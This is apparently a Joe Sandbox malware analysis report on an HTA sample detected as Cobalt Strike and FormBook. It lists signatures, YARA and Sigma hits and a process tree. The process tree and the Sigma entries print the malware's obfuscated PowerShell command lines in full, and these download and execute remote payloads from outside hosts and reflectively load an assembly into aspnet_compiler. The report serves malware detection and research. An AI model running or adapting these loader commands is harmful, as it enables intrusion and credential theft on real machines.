Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.hta

Overview

General Information

Sample name:creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.hta
Analysis ID:1562942
MD5:d01d29748ab5d89b8400eca9d5404261
SHA1:bf9ea4804980dfec867d360ccff43ac7aaab8eb8
SHA256:b246a7077befaaa252210036012149efa84584bd76ba564f875f5cb227ee78d8
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike, FormBook, HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected HtmlPhish44
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
PowerShell case anomaly found
Queues an APC in another process (thread injection)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: AspNetCompiler Execution
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 7544 cmdline: mshta.exe "C:\Users\user\Desktop\creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 7648 cmdline: "C:\Windows\SYsTem32\windOwsPoWeRshELl\v1.0\PowershELl.ExE" "PoWerSheLL.eXE -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe ; ieX($(iEX('[sySteM.TEXT.EnCOdIng]'+[CHAR]58+[chAR]0X3a+'UTF8.GetsTriNg([sysTem.ConVert]'+[CHaR]0X3A+[CHAr]0x3A+'fRombasE64sTRiNG('+[ChAR]0X22+'JGVZYlFRYlRxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRFZklOaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRLYk1uT2lGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5ZkVqSG9vTHUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGeXNTUVRxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZ04pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImduS3dXQyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvWlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZVliUVFiVHE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDYuNzAuMTU1LjI1NC8xMTUwL2NyZWF0ZWFiZXR0ZXJidXR0ZXJzbW9vdGhzbW9vdGh5a2luZ3N0b2dldG1lc3dlZWV0bmVzcy50SUYiLCIkRW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMiLDAsMCk7c3RBclQtU0xFRXAoMyk7aWV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMi'+[chAr]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7772 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • csc.exe (PID: 7924 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uzumsuzj\uzumsuzj.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 7940 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA57E.tmp" "c:\Users\user\AppData\Local\Temp\uzumsuzj\CSC9B0A3672FBDD48D4844B884E3D96D699.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • wscript.exe (PID: 8044 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createabetterbuttersmoothsmoothykingstogetmesw.vBs" MD5: FF00E0480075B095948000BDC66E81F0)
        • powershell.exe (PID: 8096 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnT0pQaW1hZ2VVcmwgPSBHZEhodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxlaycrJ2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNCcrJ3RueGxBJysnVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGMnKyc5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBHJysnZEg7T0pQd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0JysnLldlYkNsaWVudDtPSicrJ1BpbWEnKydnZUJ5dGVzID0gT0pQd2ViQ2xpZW50LkRvd25sb2FkRGF0YShPSlBpbWFnZVVybCk7T0pQaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuYycrJ29kaW4nKydnXTo6VVRGOC5HZXRTdHJpbmcoT0pQaW1hZ2VCeXRlcyk7T0pQc3RhcnRGbGFnID0gR2RIPDxCQVNFNjRfU1RBUlQ+PkdkSDtPJysnSlBlbmRGbGFnID0gR2RIPDxCQVNFNjRfRU5EPj5HZEg7T0pQc3RhcnRJbmRleCA9IE9KUGltYWdlVGV4dC5JbicrJ2RleE9mKE9KUHN0YXJ0RmxhZyk7T0pQZW5kSW5kZXggPSBPSlBpbWFnZVRleHQuSW4nKydkZXhPZihPSlBlbmRGbGFnKTtPSlBzdGFydEluZGV4IC1nZSAwIC1hbmQgT0pQZW5kSW5kZXggLWd0JysnIE9KUHN0YXJ0SW5kZXg7T0pQc3RhcnRJbmRleCArPSBPSlBzdGFydEZsYWcuTGVuZ3RoO09KUGJhc2U2NExlbmd0aCA9IE9KUGVuZEluZGV4IC0gT0pQcycrJ3RhcnRJbmRleDtPSlBiYXNlNjRDb21tYW5kID0gJysnT0pQaW1hZ2VUZXh0LlN1YnN0cmluZyhPSlBzdGFydEluZGV4LCBPSlBiYXNlNjRMZW5ndGgpJysnO09KUGJhc2U2NFJldmVyc2VkID0gLWpvJysnaW4gKE9KUGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSByZVIgRm9yRWFjaC1PYmplY3QgeyBPSlBfIH0pWy0xLi4tKE9KUGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07T0pQY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhPSlBiYXNlNjRSZXZlcnNlZCk7T0pQbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKE9KUGNvbW0nKydhbmRCeXRlcyk7T0pQdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChHZEhWJysnQUlHZEgpO09KUHZhaU1lJysndGhvZC5JbnZva2UoT0pQbnVsbCwgQChHZEh0eHQuQU1NUkMvMDUxMS80NTIuNTUnKycxLjA3LjY0MS8vOnB0dGhHJysnZEgsICcrJ0dkSGRlc2F0aScrJ3ZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGFzcG5ldF9jb21waWxlckdkSCwgR2RIZGVzYXRpdmFkb0dkSCwgR2RIZGVzYXRpdmFkb0dkSCxHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIZGVzYXRpJysndmFkb0dkSCwnKydHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIMUdkSCxHZEhkZXNhdGl2YWRvR2RIKSk7JyktY1JlcGxhQ2UgIChbQ0hhUl03MStbQ0hhUl0xMDArW0NIYVJdNzIpLFtDSGFSXTM5LWNSZXBsYUNlIChbQ0hhUl0xMTQrW0NIYVJdMTAxK1tDSGFSXTgyKSxbQ0hhUl0xMjQgLWNSZXBsYUNlIChbQ0hhUl03OStbQ0hhUl03NCtbQ0hhUl04MCksW0NIYVJdMzYpfC4gKCAkc2hlbGxpRFsxXSskU0hFTGxpZFsxM10rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7184 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('OJPimageUrl = GdHhttps://3105.filemail.com/api/file/get?filek'+'ey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4'+'tnxlA'+'VbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c'+'9bfb9571732531309b5ff7c G'+'dH;OJPwebClient = New-Object System.Net'+'.WebClient;OJ'+'Pima'+'geBytes = OJPwebClient.DownloadData(OJPimageUrl);OJPimageText = [System.Text.Enc'+'odin'+'g]::UTF8.GetString(OJPimageBytes);OJPstartFlag = GdH<<BASE64_START>>GdH;O'+'JPendFlag = GdH<<BASE64_END>>GdH;OJPstartIndex = OJPimageText.In'+'dexOf(OJPstartFlag);OJPendIndex = OJPimageText.In'+'dexOf(OJPendFlag);OJPstartIndex -ge 0 -and OJPendIndex -gt'+' OJPstartIndex;OJPstartIndex += OJPstartFlag.Length;OJPbase64Length = OJPendIndex - OJPs'+'tartIndex;OJPbase64Command = '+'OJPimageText.Substring(OJPstartIndex, OJPbase64Length)'+';OJPbase64Reversed = -jo'+'in (OJPbase64Command.ToCharArray() reR ForEach-Object { OJP_ })[-1..-(OJPbase64Command.Length)];OJPcommandBytes = [System.Convert]::FromBase64String(OJPbase64Reversed);OJPloadedAssembly = [System.Reflection.Assembly]::Load(OJPcomm'+'andBytes);OJPvaiMethod = [dnlib.IO.Home].GetMethod(GdHV'+'AIGdH);OJPvaiMe'+'thod.Invoke(OJPnull, @(GdHtxt.AMMRC/0511/452.55'+'1.07.641//:ptthG'+'dH, '+'GdHdesati'+'vadoGdH, GdHdesativadoGdH, GdHdesativadoGdH, GdHaspnet_compilerGdH, GdHdesativadoGdH, GdHdesativadoGdH,GdHdesativadoGdH,GdHdesativadoGdH,GdHdesati'+'vadoGdH,'+'GdHdesativadoGdH,GdHdesativadoGdH,GdH1GdH,GdHdesativadoGdH));')-cReplaCe ([CHaR]71+[CHaR]100+[CHaR]72),[CHaR]39-cReplaCe ([CHaR]114+[CHaR]101+[CHaR]82),[CHaR]124 -cReplaCe ([CHaR]79+[CHaR]74+[CHaR]80),[CHaR]36)|. ( $shelliD[1]+$SHELlid[13]+'x')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • aspnet_compiler.exe (PID: 3676 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
            • aspnet_compiler.exe (PID: 7412 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
              • TjxlUxenxgDChq.exe (PID: 4572 cmdline: "C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                • cleanmgr.exe (PID: 7636 cmdline: "C:\Windows\SysWOW64\cleanmgr.exe" MD5: 527CCDB339E5A54F4B37B6FAD08A44B5)
                  • TjxlUxenxgDChq.exe (PID: 3000 cmdline: "C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                  • firefox.exe (PID: 688 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    0000000F.00000002.2565803965.0000000003170000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000F.00000002.2565803965.0000000003170000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bf30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13fdf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x28ddb7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x275e66:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        0000000D.00000002.2276568583.0000000005F80000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          Click to see the 14 entries
          SourceRuleDescriptionAuthorStrings
          13.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            13.2.aspnet_compiler.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e403:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x164b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            13.2.aspnet_compiler.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              13.2.aspnet_compiler.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
              • 0x2f203:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
              • 0x172b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
              SourceRuleDescriptionAuthorStrings
              amsi32_7648.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
                amsi32_7184.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                  amsi32_7184.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnT0pQaW1hZ2VVcmwgPSBHZEhodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxlaycrJ2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNCcrJ3RueGxBJysnVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGMnKyc5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBHJysnZEg7T0pQd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0JysnLldlYkNsaWVudDtPSicrJ1BpbWEnKydnZUJ5dGVzID0gT0pQd2ViQ2xpZW50LkRvd25sb2FkRGF0YShPSlBpbWFnZVVybCk7T0pQaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuYycrJ29kaW4nKydnXTo6VVRGOC5HZXRTdHJpbmcoT0pQaW1hZ2VCeXRlcyk7T0pQc3RhcnRGbGFnID0gR2RIPDxCQVNFNjRfU1RBUlQ+PkdkSDtPJysnSlBlbmRGbGFnID0gR2RIPDxCQVNFNjRfRU5EPj5HZEg7T0pQc3RhcnRJbmRleCA9IE9KUGltYWdlVGV4dC5JbicrJ2RleE9mKE9KUHN0YXJ0RmxhZyk7T0pQZW5kSW5kZXggPSBPSlBpbWFnZVRleHQuSW4nKydkZXhPZihPSlBlbmRGbGFnKTtPSlBzdGFydEluZGV4IC1nZSAwIC1hbmQgT0pQZW5kSW5kZXggLWd0JysnIE9KUHN0YXJ0SW5kZXg7T0pQc3RhcnRJbmRleCArPSBPSlBzdGFydEZsYWcuTGVuZ3RoO09KUGJhc2U2NExlbmd0aCA9IE9KUGVuZEluZGV4IC0gT0pQcycrJ3RhcnRJbmRleDtPSlBiYXNlNjRDb21tYW5kID0gJysnT0pQaW1hZ2VUZXh0LlN1YnN0cmluZyhPSlBzdGFydEluZGV4LCBPSlBiYXNlNjRMZW5ndGgpJysnO09KUGJhc2U2NFJldmVyc2VkID0gLWpvJysnaW4gKE9KUGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSByZVIgRm9yRWFjaC1PYmplY3QgeyBPSlBfIH0pWy0xLi4tKE9KUGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07T0pQY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhPSlBiYXNlNjRSZXZlcnNlZCk7T0pQbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKE9KUGNvbW0nKydhbmRCeXRlcyk7T0pQdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChHZEhWJysnQUlHZEgpO09KUHZhaU1lJysndGhvZC5JbnZva2UoT0pQbnVsbCwgQChHZEh0eHQuQU1NUkMvMDUxMS80NTIuNTUnKycxLjA3LjY0MS8vOnB0dGhHJysnZEgsICcrJ0dkSGRlc2F0aScrJ3ZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGFzcG5ldF9jb21waWxlckdkSCwgR2RIZGVzYXRpdmFkb0dkSCwgR2RIZGVzYXRpdmFkb0dkSCxHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIZGVzYXRpJysndmFkb0dkSCwnKydHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIMUdkSCxHZEhkZXNhdGl2YWRvR2RIKSk7JyktY1JlcGxhQ2UgIChbQ0hhUl03MStbQ0hhUl0xMDArW0NIYVJdNzIpLFtDSGFSXTM5LWNSZXBsYUNlIChbQ0hhUl0xMTQrW0NIYVJdMTAxK1tDSGFSXTgyKSxbQ0hhUl0xMjQgLWNSZXBsYUNlIChbQ0hhUl03OStbQ0hhUl03NCtbQ0hhUl04MCksW0NIYVJdMzYpfC4gKCAkc2hlbGxpRFsxXSskU0hFTGxpZFsxM10rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnT0pQaW1hZ2VVcmwgPSBHZEhodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxlaycrJ2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNCcrJ3RueGxBJysnVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGMnKyc5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBHJysnZEg7T0pQd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0JysnLldlYkNsaWVudDtPSicrJ1BpbWEnKydnZUJ5dGVzID0gT0pQd2ViQ2xpZW50LkRvd25sb2FkRGF0YShPSlBpbWFnZVVybCk7T0pQaW1hZ2VUZXh0ID0gW1N5c3Rl
                    Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('OJPimageUrl = GdHhttps://3105.filemail.com/api/file/get?filek'+'ey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4'+'tnxlA'+'VbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c'+'9bfb9571732531309b5ff7c G'+'dH;OJPwebClient = New-Object System.Net'+'.WebClient;OJ'+'Pima'+'geBytes = OJPwebClient.DownloadData(OJPimageUrl);OJPimageText = [System.Text.Enc'+'odin'+'g]::UTF8.GetString(OJPimageBytes);OJPstartFlag = GdH<<BASE64_START>>GdH;O'+'JPendFlag = GdH<<BASE64_END>>GdH;OJPstartIndex = OJPimageText.In'+'dexOf(OJPstartFlag);OJPendIndex = OJPimageText.In'+'dexOf(OJPendFlag);OJPstartIndex -ge 0 -and OJPendIndex -gt'+' OJPstartIndex;OJPstartIndex += OJPstartFlag.Length;OJPbase64Length = OJPendIndex - OJPs'+'tartIndex;OJPbase64Command = '+'OJPimageText.Substring(OJPstartIndex, OJPbase64Length)'+';OJPbase64Reversed = -jo'+'in (OJPbase64Command.ToCharArray() reR ForEach-Object { OJP_ })[-1..-(OJPbase64Command.Length)];OJPcommandBytes = [System.Convert]::FromBase64String(OJPbase64Reversed);OJPloadedAssembly = [System.Reflection.Assembly]::Load(OJPcomm'+'andBytes);OJPvaiMethod = [dnlib.IO.Home].GetMethod(GdHV'+'AIGdH);OJPvaiMe'+'thod.Invoke(OJPnull, @(GdHtxt.AMMRC/0511/452.55'+'1.07.641//:ptthG'+'dH, '+'GdHdesati'+'vadoGdH, GdHdesativadoGdH, GdHdesativadoGdH, GdHaspnet_compilerGdH, GdHdesativadoGdH, GdHdesativadoGdH,GdHdesativadoGdH,GdHdesativadoGdH,GdHdesati'+'vadoGdH,'+'GdHdesativadoGdH,GdHdesativadoGdH,GdH1GdH,GdHdesativadoGdH));')-cReplaCe ([CHaR]71+[CHaR]100+[CHaR]72),[CHaR]39-cReplaCe ([CHaR]114+[CHaR]101+[CHaR]82),[CHaR]124 -cReplaCe ([CHaR]79+[CHaR]74+[CHaR]80),[CHaR]36)|. ( $shelliD[1]+$SHELlid[13]+'x')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('OJPimageUrl = GdHhttps://3105.filemail.com/api/file/get?filek'+'ey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4'+'tnxlA'+'VbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c'+'9bfb9571732531309b5ff7c G'+'dH;OJPwebClient = New-Object System.Net'+'.WebClient;OJ'+'Pima'+'geBytes = OJPwebClient.DownloadData(OJPimageUrl);OJPimageText = [System.Text.Enc'+'odin'+'g]::UTF8.GetString(OJPimageBytes);OJPstartFlag = GdH<<BASE64_START>>GdH;O'+'JPendFlag = GdH<<BASE64_END>>GdH;OJPstartIndex = OJPimageText.In'+'dexOf(OJPstartFlag);OJPendIndex = OJPimageText.In'+'dexOf(OJPendFlag);OJPstartIndex -ge 0 -and OJPendIndex -gt'+' OJPstartIndex;OJPstartIndex += OJPstartFlag.Length;OJPbase64Length = OJPendIndex - OJPs'+'tartIndex;OJPbase64Command = '+'OJPimageText.Substring(OJPstartIndex, OJPbase64Length)'+';OJPbase64Reversed = -jo'+'in (OJPbase64Command.ToCharArray() reR ForEach-Object { OJP_ })[-1..-(OJPbase64Command.Length)];OJPcommandBytes = [System.Convert]::FromBase64String(OJPbase64Reversed);OJPloadedAssembly = [System.Reflection.Assembly]::Load(OJPcomm'+'andBytes);OJPvaiMethod = [dnlib.IO.
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('OJPimageUrl = GdHhttps://3105.filemail.com/api/file/get?filek'+'ey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4'+'tnxlA'+'VbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c'+'9bfb9571732531309b5ff7c G'+'dH;OJPwebClient = New-Object System.Net'+'.WebClient;OJ'+'Pima'+'geBytes = OJPwebClient.DownloadData(OJPimageUrl);OJPimageText = [System.Text.Enc'+'odin'+'g]::UTF8.GetString(OJPimageBytes);OJPstartFlag = GdH<<BASE64_START>>GdH;O'+'JPendFlag = GdH<<BASE64_END>>GdH;OJPstartIndex = OJPimageText.In'+'dexOf(OJPstartFlag);OJPendIndex = OJPimageText.In'+'dexOf(OJPendFlag);OJPstartIndex -ge 0 -and OJPendIndex -gt'+' OJPstartIndex;OJPstartIndex += OJPstartFlag.Length;OJPbase64Length = OJPendIndex - OJPs'+'tartIndex;OJPbase64Command = 